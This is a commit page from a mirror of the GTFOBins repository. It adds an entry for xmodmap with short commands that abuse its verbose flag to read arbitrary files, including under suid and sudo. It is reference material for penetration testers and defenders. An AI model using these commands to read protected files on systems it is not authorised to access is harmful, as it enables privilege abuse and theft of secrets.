mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
New command: xmodmap
This commit is contained in:
parent
f9043b2f14
commit
66cc5dd512
17
_gtfobins/xmodmap.md
Normal file
17
_gtfobins/xmodmap.md
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
---
|
||||||
|
description: |
|
||||||
|
The read file content is corrupted by error prints.
|
||||||
|
functions:
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
xmodmap -v "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./xmodmap -v "$LFILE"
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo xmodmap -v "$LFILE"
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user